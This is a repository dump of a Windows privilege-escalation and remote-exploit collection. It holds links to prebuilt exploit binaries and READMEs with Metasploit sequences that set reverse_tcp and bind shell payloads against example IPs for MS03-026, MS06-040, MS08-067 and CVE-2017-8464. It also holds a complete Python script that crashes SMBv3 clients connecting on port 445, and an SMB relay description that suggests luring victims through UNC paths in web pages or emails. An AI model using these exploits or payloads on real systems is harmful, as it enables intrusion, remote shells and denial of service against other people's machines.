├── CVE-2017-0213 ├── CVE-2017-0213-zcgonvh-master.zip ├── CVE-2017-0213.cpp ├── CVE-2017-0213_x64.zip ├── CVE-2017-0213_x86.zip ├── README.md └── win10.png ├── CVE-2017-8464 ├── README.md └── cve_2017_8464_lnk_rce.rb ├── CVE-2018-0833 ├── README.md ├── exploit.gif └── poc.py ├── LICENSE ├── MS03-026 ├── 66.c ├── MS03-026.exe ├── README.md └── ms03-026.c ├── MS05-039 ├── MS05-039.exe ├── PnP_Service.c └── README.md ├── MS06-040 ├── 2355.pm ├── README.md └── ms06040.rar ├── MS08-025 ├── MS08-025.exe ├── README.md ├── ms08025.rar └── source.zip ├── MS08-066 └── ms08066提权(XP 2003).zip ├── MS08-067 ├── 40279.py ├── MS08-067.exe ├── MS08-067_2K3.exe └── README.md ├── MS08-068 ├── Disable_Port_445.reg ├── Enable_Port_445.reg ├── README.md ├── libeay32.dll ├── smbrelay3.exe ├── smrs.exe └── src │ ├── httprelay.cpp │ ├── httprelay.h │ ├── imaprelay.cpp │ ├── imaprelay.h │ ├── misc.cpp │ ├── misc.h │ ├── ntlm.cpp │ ├── ntlm.h │ ├── payload.cpp │ ├── payload.h │ ├── pop3relay.cpp │ ├── pop3relay.h │ ├── smb.cpp │ ├── smb.h │ ├── smbrelay.h │ ├── smbrelay3.cpp │ ├── smtprelay.cpp │ └── smtprelay.h ├── MS09-012 ├── Chimichurri │ ├── .svn │ │ ├── all-wcprops │ │ ├── entries │ │ ├── prop-base │ │ │ ├── Chimichurri.ncb.svn-base │ │ │ └── Chimichurri.suo.svn-base │ │ └── text-base │ │ │ ├── Chimichurri.cpp.svn-base │ │ │ ├── Chimichurri.ncb.svn-base │ │ │ ├── Chimichurri.sln.svn-base │ │ │ ├── Chimichurri.suo.svn-base │ │ │ ├── Chimichurri.vcproj.svn-base │ │ │ ├── ReadMe.txt.svn-base │ │ │ ├── stdafx.cpp.svn-base │ │ │ └── stdafx.h.svn-base │ ├── Chimichurri.cpp │ ├── Chimichurri.ncb │ ├── Chimichurri.sln │ ├── Chimichurri.suo │ ├── Chimichurri.vcproj │ ├── Debug │ │ └── .svn │ │ │ ├── all-wcprops │ │ │ └── entries │ ├── ReadMe.txt │ ├── stdafx.cpp │ └── stdafx.h ├── Churraskito-source.zip ├── MS09-012KB952004-CVE-2009-0079-烤肉Churrasco.rar ├── README.md ├── churrasco.png ├── pr.exe └── pr.png ├── MS09-020 ├── MS09-020-KB970483-CVE-2009-1535-IIS6.zip ├── README.md └── iis6.0.png 
├── MS09-050 ├── 40280.py ├── 41987.py └── README.md ├── MS10-012 ├── MS10-012.txt ├── MS10-020.py └── README.md ├── MS10-015 ├── CVE-2010-0232.txt ├── MS10-015.zip ├── MS10-015KB977165-CVE-2010-0232-Ms-Viru.rar ├── README.md ├── screenshot.png └── win2003.png ├── MS10-048 ├── 2003.png ├── README.md └── ms10048 │ ├── ms10048.exe │ └── ms10048X64.exe ├── MS10-059 ├── Churraskito_exe.zip ├── MS10-059.exe └── README.md ├── MS10-065 ├── MS10-065-KB2124261-KB2271195-CVE-2010-1899-IIS7.zip └── README.md ├── MS10-092 ├── CVE-2010-3338.wsf ├── Enviroment │ └── FoxitReader411_enu_Setup.exe ├── MS10-092.rb └── README.md ├── MS11-011 ├── 16262.c ├── MS11-011.exe └── README.md ├── MS11-046 ├── 2003.png ├── 2003_k8.png ├── CVE-2011-1249.c ├── MS11_46_k8.exe ├── README.md ├── ms11-046.exe └── win7.png ├── MS11-062 ├── 40627.exe ├── CVE-2011-1974.c ├── MS11-062.exe ├── README.md ├── service_st.png └── win2003.png ├── MS11-080 ├── 2003_k8.png ├── CVE-2011-2005.py ├── MS11_80_k8.exe ├── README.md ├── ms11-080-AddUser.exe ├── ms11-080.exe ├── win2003.png └── win7.jpg ├── MS12-020 ├── MS12-020.rb ├── MS12-020KB2621440-CVE-2012-0002.rar ├── MS12-020检测.zip ├── README.md ├── blue-death.png ├── ms12-020.exe ├── ms12-020_.exe ├── msf.png └── rdpclient.rar ├── MS12-042 ├── README.md ├── Sysret(MS12-042).zip ├── sysret-source │ ├── junk.suo │ ├── junk │ │ ├── MinHook │ │ │ ├── MinHook.h │ │ │ └── MinHook.x64.lib │ │ ├── ReadMe.txt │ │ ├── junk.vcxproj │ │ ├── junk.vcxproj.filters │ │ ├── junk.vcxproj.user │ │ ├── krnlutils.cpp │ │ ├── log.cpp │ │ ├── log.h │ │ ├── peutil.h │ │ ├── peutils.cpp │ │ ├── sources │ │ │ ├── CMakeLists.txt │ │ │ ├── beaengineSources │ │ │ │ ├── BeaEngine.c │ │ │ │ ├── BeaEngine.obj │ │ │ │ ├── CMakeLists.txt │ │ │ │ ├── COPYING.LESSER.txt │ │ │ │ ├── COPYING.txt │ │ │ │ ├── Includes │ │ │ │ │ ├── BeaEngineVersion.c │ │ │ │ │ ├── Routines_Disasm.c │ │ │ │ │ ├── Routines_ModRM.c │ │ │ │ │ ├── instr_set │ │ │ │ │ │ ├── Data_opcode.h │ │ │ │ │ │ ├── opcodes_AES.c │ │ 
│ │ │ │ ├── opcodes_A_M.c │ │ │ │ │ │ ├── opcodes_CLMUL.c │ │ │ │ │ │ ├── opcodes_FPU.c │ │ │ │ │ │ ├── opcodes_Grp1.c │ │ │ │ │ │ ├── opcodes_Grp12.c │ │ │ │ │ │ ├── opcodes_Grp13.c │ │ │ │ │ │ ├── opcodes_Grp14.c │ │ │ │ │ │ ├── opcodes_Grp15.c │ │ │ │ │ │ ├── opcodes_Grp16.c │ │ │ │ │ │ ├── opcodes_Grp2.c │ │ │ │ │ │ ├── opcodes_Grp3.c │ │ │ │ │ │ ├── opcodes_Grp4.c │ │ │ │ │ │ ├── opcodes_Grp5.c │ │ │ │ │ │ ├── opcodes_Grp6.c │ │ │ │ │ │ ├── opcodes_Grp7.c │ │ │ │ │ │ ├── opcodes_Grp8.c │ │ │ │ │ │ ├── opcodes_Grp9.c │ │ │ │ │ │ ├── opcodes_MMX.c │ │ │ │ │ │ ├── opcodes_N_Z.c │ │ │ │ │ │ ├── opcodes_SSE.c │ │ │ │ │ │ └── opcodes_prefixes.c │ │ │ │ │ ├── internal_datas.h │ │ │ │ │ └── protos.h │ │ │ │ └── README.txt │ │ │ └── include │ │ │ │ └── beaengine │ │ │ │ ├── BeaEngine.h │ │ │ │ ├── basic_types.h │ │ │ │ ├── export.h │ │ │ │ └── macros.h │ │ ├── stdafx.cpp │ │ ├── stdafx.h │ │ ├── sysret.cpp │ │ ├── sysret.h │ │ ├── targetver.h │ │ └── trigger.asm │ ├── sysret.sln │ ├── sysret.suo │ └── x64 │ │ └── Release │ │ ├── MinHook.x64.dll │ │ └── sysret.exe └── win7.png ├── MS13-005 ├── README.md └── ms13-005-funz-poc.cpp ├── MS13-046 ├── 2003.png ├── MS13-046-KB2829361 │ ├── epathobj_exp32(MS13-046).exe │ └── epathobj_exp64(MS13-046).exe ├── README.md └── win7_local.png ├── MS13-053 ├── 2003.png ├── MS13-053-KB2850851.zip └── README.md ├── MS14-002 ├── CVE-2013-5065.c ├── CVE-2013-5065.exe ├── CVE-2013-5065.py ├── MS14-002.exe ├── README.md └── win2003.png ├── MS14-040 ├── CVE-2014-1767 │ ├── 39446.py │ ├── 39525.py │ ├── MS14-040.cpp │ └── MS14-40-x32.py ├── MS14-040-x64.exe ├── MS14-40-x86.exe └── README.md ├── MS14-058 ├── 2008.png ├── CVE-2014-4113-Exploit.rar ├── Exploit │ ├── .vs │ │ └── Exploit │ │ │ └── v14 │ │ │ └── .suo │ ├── Exploit.VC.db │ ├── Exploit.sln │ ├── Exploit.v12.suo │ ├── Exploit │ │ ├── Exploit.cpp │ │ ├── Exploit.vcxproj │ │ ├── Exploit.vcxproj.filters │ │ ├── ReadMe.txt │ │ ├── Release │ │ │ ├── Exploit.log │ │ │ ├── Exploit.obj │ │ │ 
├── Exploit.pch │ │ │ ├── Exploit.tlog │ │ │ │ ├── CL.command.1.tlog │ │ │ │ ├── CL.read.1.tlog │ │ │ │ ├── CL.write.1.tlog │ │ │ │ ├── Exploit.lastbuildstate │ │ │ │ ├── link.command.1.tlog │ │ │ │ ├── link.read.1.tlog │ │ │ │ └── link.write.1.tlog │ │ │ ├── stdafx.obj │ │ │ └── vc140.pdb │ │ ├── stdafx.cpp │ │ ├── stdafx.h │ │ └── targetver.h │ └── Release │ │ ├── Exploit.exe │ │ ├── Exploit.iobj │ │ ├── Exploit.ipdb │ │ └── Exploit.pdb ├── MS14-058.exe ├── README.md ├── Trigger │ ├── Trigger.opensdf │ ├── Trigger.sln │ ├── Trigger.v12.suo │ └── Trigger │ │ ├── ReadMe.txt │ │ ├── Trigger.cpp │ │ ├── Trigger.vcxproj │ │ ├── Trigger.vcxproj.filters │ │ ├── stdafx.cpp │ │ ├── stdafx.h │ │ └── targetver.h └── win7.png ├── MS14-068 ├── MS14-068.exe ├── README.md ├── img │ ├── x1.png │ ├── x2.png │ ├── x3.png │ └── x4.png ├── mimikatz_trunk.zip └── pykek │ ├── README.md │ ├── kek │ ├── __init__.py │ ├── _crypto │ │ ├── ARC4.py │ │ ├── MD4.py │ │ ├── MD5.py │ │ └── __init__.py │ ├── ccache.py │ ├── crypto.py │ ├── krb5.py │ ├── pac.py │ └── util.py │ ├── ms14-068.py │ └── pyasn1 │ ├── __init__.py │ ├── codec │ ├── __init__.py │ ├── ber │ │ ├── __init__.py │ │ ├── decoder.py │ │ ├── encoder.py │ │ └── eoo.py │ ├── cer │ │ ├── __init__.py │ │ ├── decoder.py │ │ └── encoder.py │ └── der │ │ ├── __init__.py │ │ ├── decoder.py │ │ └── encoder.py │ ├── compat │ ├── __init__.py │ └── octets.py │ ├── debug.py │ ├── error.py │ └── type │ ├── __init__.py │ ├── base.py │ ├── char.py │ ├── constraint.py │ ├── error.py │ ├── namedtype.py │ ├── namedval.py │ ├── tag.py │ ├── tagmap.py │ ├── univ.py │ └── useful.py ├── MS14-070 ├── CVE-2014-4076.c ├── MS14-070.rar ├── MS14-070 │ ├── 35936.exe │ └── 37755.exe ├── README.md └── win2003.png ├── MS15-001 ├── AppCompatCache.exe ├── README.md ├── TestDLL.dll └── source.zip ├── MS15-010 ├── 37098.txt ├── 39035.exe ├── CVE-2015-0057.zip └── README.md ├── MS15-015 ├── README.md └── ms15-015.zip ├── MS15-051 ├── 2008.png ├── 37049-32.exe ├── 
Compiled │ ├── Taihou32.exe │ └── Taihou64.exe ├── MS15-051-KB3045171.zip ├── README.md ├── ms15-051.zip └── win7.png ├── MS15-061 ├── README.md └── ms15-061.cpp ├── MS15-076 ├── Binary │ ├── Microsoft.VisualStudio.OLE.Interop.dll │ └── Trebuchet.exe ├── README.md └── source.zip ├── MS15-077 ├── 2003.png ├── HTFontExp.rar ├── MS15-077-KB3077657.zip ├── README.md ├── elevator.exe ├── ex.cpp ├── exp │ ├── WindowsServer2003-KB3077657-x64-ENU.exe │ └── WindowsServer2003-KB3077657-x86-ENU.exe ├── win7-x64.png └── win7.jpg ├── MS15-097 ├── 38198 │ ├── Poc_NtUserGetClipboardAccessToken_SecurityBypass.exe │ └── injected.dll ├── MS15-097-KB3079904-CVE-2015-2527.zip ├── README.md └── exp │ ├── README.md │ └── _CVE_2015_2546_exp.cpp ├── MS16-014 └── ms16-014.rar ├── MS16-016 ├── 39788 │ ├── EoP.exe │ └── Shellcode.dll ├── BSoD.exe ├── EoP.zip ├── EoP_variant.zip ├── README.md ├── bsod_win10x64.gif └── eop_win7x86.gif ├── MS16-032 ├── MS16-032.ps1 ├── README.md ├── img │ ├── win10.png │ ├── x64.png │ └── x86.png ├── x64 │ └── ms16-032.exe └── x86 │ └── ms16-032.exe ├── MS16-034 ├── FillRgn_BSoD.cpp ├── MS16-034-exp.cpp └── README.md ├── MS16-075 ├── README.md ├── Tater.ps1 ├── img │ ├── IIS_shell.png │ ├── potato.png │ └── win10.png ├── ms16-075.rb └── potato.exe ├── MS16-098 ├── README.md ├── bfill.exe ├── gdi-palettes-exp.zip ├── main.c └── win8_1.png ├── MS16-111 ├── 40429.cs ├── 40429.exe ├── README.md ├── win10.png └── win8.1.png ├── MS16-135 ├── 40823 │ ├── SetWindowLongPtr_Exploit.exe │ └── SetWindowLongPtr_Exploit.pdb ├── 40823-source.zip ├── 41015.c ├── 41015.exe ├── MS16-135.ps1 ├── README.md ├── Win10.png ├── Win7.png ├── Win8.png └── Win81.png ├── MS17-010 ├── MS17-010-2012.zip ├── README.md └── ms17_010_eternalblue.rb ├── MS17-017 ├── MS17-017.cpp ├── MS17-017.exe ├── README.md ├── gdi-palettes-exp.zip └── ms17-017.jpg ├── README.md └── win-exp-suggester ├── 2017-06-14-mssb.xls ├── README.md ├── help.md └── windows-exploit-suggester.py 
/CVE-2017-0213/CVE-2017-0213-zcgonvh-master.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/CVE-2017-0213/CVE-2017-0213-zcgonvh-master.zip
--------------------------------------------------------------------------------
/CVE-2017-0213/CVE-2017-0213.cpp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/CVE-2017-0213/CVE-2017-0213.cpp
--------------------------------------------------------------------------------
/CVE-2017-0213/CVE-2017-0213_x64.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/CVE-2017-0213/CVE-2017-0213_x64.zip
--------------------------------------------------------------------------------
/CVE-2017-0213/CVE-2017-0213_x86.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/CVE-2017-0213/CVE-2017-0213_x86.zip
--------------------------------------------------------------------------------
/CVE-2017-0213/README.md:
--------------------------------------------------------------------------------
# CVE-2017-0213

Windows COM Elevation of Privilege Vulnerability

**Description**
```
An elevation of privilege exists in Windows COM Aggregate Marshaler.
An attacker who successfully exploited the vulnerability could run arbitrary code with elevated privileges.
To exploit the vulnerability, an attacker could run a specially crafted application that could exploit the vulnerability.
This vulnerability by itself does not allow arbitrary code to be run.
However, this vulnerability could be used in conjunction with one or more vulnerabilities (e.g. a remote code execution vulnerability and another elevation of privilege) that could take advantage of the elevated privileges when running.
The update addresses the vulnerability by correcting how Windows COM Marshaler processes interface requests.
```
- The exploit was taken from [@WindowsExploits](https://github.com/WindowsExploits/Exploits/tree/master/CVE-2017-0213/Source)

Vulnerability reference:
* [CVE-2017-0213](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0213)
* [exp-db](https://www.exploit-db.com/exploits/42020/)


## Usage
- [YouTube-CVE 2017-0213](https://www.youtube.com/watch?v=6naFH9MQHy8)
```
c:\> CVE-2017-0213_x64.exe
```
![win10](win10.png)


## References
- [Windows: COM Aggregate Marshaler/IRemUnknown2 Type Confusion EoP](https://bugs.chromium.org/p/project-zero/issues/detail?id=1107)
- [Microsoft](https://portal.msrc.microsoft.com/en-US/eula)

--------------------------------------------------------------------------------
/CVE-2017-0213/win10.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/CVE-2017-0213/win10.png
--------------------------------------------------------------------------------
/CVE-2017-8464/README.md:
--------------------------------------------------------------------------------
# CVE-2017-8464
```
Windows Shell in Microsoft Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1,
Windows Server 2012 Gold and R2, Windows RT 8.1, Windows 10 Gold, 1511, 1607, 1703, and Windows Server 2016
allows local users or remote attackers to execute arbitrary code via a crafted .LNK file, which is not properly handled
during icon display in Windows Explorer or any other application that parses the icon of the shortcut.
aka "LNK Remote Code Execution Vulnerability."
```

Vulnerability reference:
* [CVE-2017-8464](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8464)
* [exp-db](https://www.exploit-db.com/exploits/42382/)


## Load the module within the Metasploit console
[msf](https://www.rapid7.com/db/modules/exploit/windows/local/ms10_092_schelevator)
```
msf > use exploit/windows/fileformat/cve_2017_8464_lnk_rce
msf exploit(cve_2017_8464_lnk_rce) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf exploit(cve_2017_8464_lnk_rce) > set lhost
msf exploit(cve_2017_8464_lnk_rce) > set lport 8988
msf exploit(cve_2017_8464_lnk_rce) > run
msf exploit(ms10_092_schelevator) > exploit

msf exploit(cve_2017_8464_lnk_rce) > use exploit/multi/handler
msf exploit(handler) > set payload windows/x64/meterpreter/reverse_tcp
msf exploit(handler) > set lhost
msf exploit(handler) > set lport 8988
msf exploit(handler) > run
```
--------------------------------------------------------------------------------
/CVE-2018-0833/README.md:
--------------------------------------------------------------------------------
# SMBv3 Null Pointer Dereference Denial of Service

## Description

Server Message Block (SMB) is a network file sharing protocol that allows applications and end users to access file resources on a remote file server. The crash occurs in the module "mrxsmb", which is the Microsoft SMB redirector (the client side of SMB). Windows 8.1 and Windows Server 2012 R2 are affected; the proof of concept was run against Windows 8.1 (x86). When the client receives a carefully constructed packet, the redirector tries to read a value from address 0x00000030, which lies in protected (null-page) memory. The access to protected memory raises a kernel exception that forces the machine to restart, resulting in a denial of service.

## Usage
```
root@xxoo:/# python poc.py
```

![exploit](https://raw.githubusercontent.com/iBearcat/CVE-2018-0833/master/exploit.gif)

## Vulnerability reference:

* [smbv3 null pointer dereference vulnerability](https://krbtgt.pw/smbv3-null-pointer-dereference-vulnerability)
* [CVE-2018-0833](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0833)
* [exploit-db](https://www.exploit-db.com/exploits/44189/)
* [cnvd](http://www.cnvd.org.cn/flaw/show/CNVD-2018-05738)

--------------------------------------------------------------------------------
/CVE-2018-0833/exploit.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/CVE-2018-0833/exploit.gif
--------------------------------------------------------------------------------
/CVE-2018-0833/poc.py:
--------------------------------------------------------------------------------
# Exploit Title: Microsoft Windows SMB Client Null Pointer Dereference Denial of Service
# Date: 26/02/2018
# Exploit Author: Nabeel Ahmed
# Version: SMBv3
# Tested on: Windows 8.1 (x86), Windows Server 2012 R2 (x64)
# CVE : CVE-2018-0833

# Python 2 script: SocketServer is the Python 2 name of the module.
import SocketServer
from binascii import unhexlify

# Hex-encoded response: a 4-byte NetBIOS session header (length 0xec = 236)
# followed by the SMB2 transform header magic (0xFD 'S' 'M' 'B') and filler bytes.
payload = '000000ecfd534d4241414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141'

class byebye(SocketServer.BaseRequestHandler):
    # Handles one incoming SMB client connection and sends the malformed packet.
    def handle(self):
        try:
            print "From:", self.client_address
            print "[*]Sending Payload..."
            self.request.send(unhexlify(payload))
        except Exception:
            print "BSoD Triggered on", self.client_address
            pass

# Listen on TCP 445 so that an SMB client connecting to this host receives the payload.
SocketServer.TCPServer.allow_reuse_address = 1
launch = SocketServer.TCPServer(('', 445), byebye)
launch.serve_forever()
--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
MIT License

Copyright (c) 2017 SecWiki

Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:

The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
--------------------------------------------------------------------------------
/MS03-026/MS03-026.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS03-026/MS03-026.exe
--------------------------------------------------------------------------------
/MS03-026/README.md:
--------------------------------------------------------------------------------
# MS03-026

MS03-026

Vulnerability reference:
* [MS03-026](https://technet.microsoft.com/library/security/ms03-026)

## msf Usage
* [YouTube-ms03 026](https://www.youtube.com/watch?v=OZwQo8kqdBM)
```
msf > search ms03_026
msf > use exploit/windows/dcerpc/ms03_026_dcom
msf exploit(ms03_026_dcom) > set RHOST 192.168.229.129
msf exploit(ms03_026_dcom) > set LHOST 192.168.229.35
msf exploit(ms03_026_dcom) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(ms03_026_dcom) > exploit

meterpreter > execute -f cmd.exe -c -1
```

## References
[Microsoft Windows DCOM RPC Interface Long Hostname Remote Buffer Overflow Vulnerability](http://blog.chinaunix.net/uid-286494-id-2134482.html)
--------------------------------------------------------------------------------
/MS05-039/MS05-039.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS05-039/MS05-039.exe
--------------------------------------------------------------------------------
/MS05-039/README.md:
--------------------------------------------------------------------------------
# MS05-039


Vulnerability reference:
* [MS05-039](https://technet.microsoft.com/library/security/ms05-039)
* [CVE-2005-1983](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1983)


## References
+ [MS05039 Analysis](http://www.2cto.com/article/201304/205544.html)
+ [A First Try at the MS05039 Remote Overflow Attack](http://blog.csdn.net/shuilan0066/article/details/5920671)
+ [Analysis of the MS05-039 Vulnerability Mechanism](http://www.ithao123.cn/content-1002576.html)

--------------------------------------------------------------------------------
/MS06-040/README.md:
--------------------------------------------------------------------------------
# MS06-040

MS06-040

Vulnerability reference:
* [MS06-040](https://technet.microsoft.com/library/security/ms06-040)
* [CVE-2006-3439](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3439)
* [exp-db](https://www.exploit-db.com/exploits/2355/)

## msf Usage
* [YouTube-ms06-040](https://www.youtube.com/watch?v=AsZ8qTr7IoE)
```
msf > search ms06_040
msf > use exploit/windows/smb/ms06_040_netapi
msf exploit(ms06_040_netapi) > show payloads
msf exploit(ms06_040_netapi) > set payload windows/shell/reverse_tcp
msf exploit(ms06_040_netapi) > set RHOST 192.1.80.2
msf exploit(ms06_040_netapi) > set LHOST 192.1.80.152
msf exploit(ms06_040_netapi) > set TARGET 0
TARGET -> 0
msf exploit(ms06_040_netapi) > exploit
session -i 1

Microsoft Windows 2000 [Version 5.00.2195]
(C) 版权所有 1985-2000 Microsoft Corp.
C:\WINNT\system32>
```

## References
* [MS06-040 Explained in Plain Terms](http://blog.csdn.net/iiprogram/article/details/2820149)
* [How to Exploit MS06-040](https://www.linickx.com/how-to-exploit-ms06-040)

--------------------------------------------------------------------------------
/MS06-040/ms06040.rar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS06-040/ms06040.rar
--------------------------------------------------------------------------------
/MS08-025/MS08-025.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS08-025/MS08-025.exe
--------------------------------------------------------------------------------
/MS08-025/README.md:
--------------------------------------------------------------------------------
# MS08-025

MS08-025

Vulnerability reference:
* [MS08-025](https://technet.microsoft.com/library/security/ms08-025)
* [CVE-2008-1084](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1084)

--------------------------------------------------------------------------------
/MS08-025/ms08025.rar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS08-025/ms08025.rar
--------------------------------------------------------------------------------
/MS08-025/source.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS08-025/source.zip
--------------------------------------------------------------------------------
/MS08-066/ms08066提权(XP 2003).zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS08-066/ms08066提权(XP 2003).zip
--------------------------------------------------------------------------------
/MS08-067/MS08-067.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS08-067/MS08-067.exe
--------------------------------------------------------------------------------
/MS08-067/MS08-067_2K3.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS08-067/MS08-067_2K3.exe
--------------------------------------------------------------------------------
/MS08-067/README.md:
--------------------------------------------------------------------------------
# MS08-067
MS08-067

Vulnerability reference:
* [MS08-067](https://technet.microsoft.com/library/security/ms08-067)
* [CVE-2008-4250](http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2008-4250)

## Usage

```
msf > db_status
msf > db_nmap -sS -sV -O --script=smb-check-vulns.nse -n 192.168.229.137
msf > search ms08_067
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST 192.168.229.137
msf exploit(ms08_067_netapi) > set payload windows/shell_bind_tcp
msf exploit(ms08_067_netapi) > exploit
```

## References
+ [MS08-067 Vulnerability: Remote Overflow Intrusion Test](http://blog.csdn.net/sysprogram/article/details/8016776)
+ [Attacking the MS08_067 Vulnerability with Kali](http://jingyan.baidu.com/article/9f63fb918dcadfc8400f0e28.html)

--------------------------------------------------------------------------------
/MS08-068/Disable_Port_445.reg:
--------------------------------------------------------------------------------
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NetBT\Parameters]
"TransportBindName"=""
--------------------------------------------------------------------------------
/MS08-068/Enable_Port_445.reg:
--------------------------------------------------------------------------------
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NetBT\Parameters]
"TransportBindName"="\\Device\\"
--------------------------------------------------------------------------------
/MS08-068/README.md:
--------------------------------------------------------------------------------
# MS08-068

```
This module will relay SMB authentication requests to another host, gaining access to an authenticated SMB session if successful. If the connecting user is an administrator and network logins are allowed to the target machine, this module will execute an arbitrary payload.
To exploit this, the target system must try to authenticate to this module. The easiest way to force a SMB authentication attempt is by embedding a UNC path (\\SERVER\SHARE) into a web page or email message.
When the victim views the web page or email, their system will automatically connect to the server specified in the UNC share (the IP address of the system running this module) and attempt to authenticate.
Unfortunately, this module is not able to clean up after itself. The service and payload file listed in the output will need to be manually removed after access has been gained.
The service created by this tool uses a randomly chosen name and description, so the services list can become cluttered after repeated exploitation.
The SMB authentication relay attack was first reported by Sir Dystic on March 31st, 2001 at @lanta.con in Atlanta, Georgia. On November 11th 2008 Microsoft released bulletin MS08-068.
This bulletin includes a patch which prevents the relaying of challenge keys back to the host which issued them, preventing this exploit from working in the default configuration.
It is still possible to set the SMBHOST parameter to a third-party host that the victim is authorized to access, but the "reflection" attack has been effectively broken.
```

- The exploit is from [exp-db](https://www.exploit-db.com/exploits/20/)

Vulnerability reference:
* [MS08-068](https://technet.microsoft.com/zh-cn/zh/library/security/ms08-068)
* [CVE-2008-4037](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4037)


## Load the module within the Metasploit console
```
msf > use exploit/windows/smb/smb_relay
msf exploit(smb_relay) > show targets
...targets...
msf exploit(smb_relay) > set TARGET
msf exploit(smb_relay) > show options
...show and set options...
msf exploit(smb_relay) > exploit

```

--------------------------------------------------------------------------------
/MS08-068/libeay32.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS08-068/libeay32.dll
--------------------------------------------------------------------------------
/MS08-068/smbrelay3.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS08-068/smbrelay3.exe
--------------------------------------------------------------------------------
/MS08-068/smrs.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS08-068/smrs.exe
-------------------------------------------------------------------------------- /MS08-068/src/httprelay.h: --------------------------------------------------------------------------------
#ifndef _HTTPRELAY_H_
#define _HTTPRELAY_H_

#include "smbrelay.h"

//HTTP Functions
int HandleIncommingHTTPRequest(RELAY *relay, char *destinationhostname, int destinationport);
int ReadRequest(RELAY *relay, char *request, int requestsize);
char **ParseHeaders(char *lpBuffer, unsigned int *nheaders);
char *GetHeaderValue(char **header, int nheaders, char *Header);

#endif

-------------------------------------------------------------------------------- /MS08-068/src/imaprelay.h: --------------------------------------------------------------------------------
#ifndef _IMAP_RELAY_
#define _IMAP_RELAY_

#include "smbrelay.h"

int HandleIncommingIMAPRequest(RELAY *relay, char *destinationhostname, int destinationport);

#endif

-------------------------------------------------------------------------------- /MS08-068/src/misc.h: --------------------------------------------------------------------------------
/*
Misc data manipulation functions for Smbrelay
Andres Tarasco
*/
